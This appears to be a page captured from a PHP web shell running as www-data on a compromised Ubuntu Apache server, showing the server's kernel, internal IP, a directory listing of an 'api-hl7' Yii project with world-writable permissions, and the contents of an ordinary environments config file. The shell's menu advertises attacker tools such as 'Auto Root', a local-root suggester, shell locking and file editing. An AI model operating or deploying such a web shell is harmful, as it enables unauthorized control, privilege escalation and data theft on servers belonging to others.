Linux rspmc 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
Server IP : 192.168.20.114 & Your IP : 216.73.216.34
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
var /
www /
html /
api-hl7 /
environments /
Delete
Unzip
Name
Size
Permission
Date
Action
dev
[ DIR ]
drwxrwxrwx
2021-09-11 22:52
prod
[ DIR ]
drwxrwxrwx
2021-09-11 22:52
index.php
1.98
KB
-rwxrwxrwx
2021-09-11 22:52
Save
Rename
<?php /** * The manifest of files that are local to specific environment. * This file returns a list of environments that the application * may be installed under. The returned data must be in the following * format: * * ```php * return [ * 'environment name' => [ * 'path' => 'directory storing the local files', * 'skipFiles' => [ * // list of files that should only copied once and skipped if they already exist * ], * 'setWritable' => [ * // list of directories that should be set writable * ], * 'setExecutable' => [ * // list of files that should be set executable * ], * 'setCookieValidationKey' => [ * // list of config files that need to be inserted with automatically generated cookie validation keys * ], * 'createSymlink' => [ * // list of symlinks to be created. Keys are symlinks, and values are the targets. * ], * ], * ]; * ``` */ return [ 'Development' => [ 'path' => 'dev', 'setWritable' => [ 'backend/runtime', 'backend/web/assets', 'console/runtime', 'frontend/runtime', 'frontend/web/assets', ], 'setExecutable' => [ 'yii', 'yii_test', ], 'setCookieValidationKey' => [ 'backend/config/main-local.php', 'common/config/codeception-local.php', 'frontend/config/main-local.php', ], ], 'Production' => [ 'path' => 'prod', 'setWritable' => [ 'backend/runtime', 'backend/web/assets', 'console/runtime', 'frontend/runtime', 'frontend/web/assets', ], 'setExecutable' => [ 'yii', ], 'setCookieValidationKey' => [ 'backend/config/main-local.php', 'frontend/config/main-local.php', ], ], ];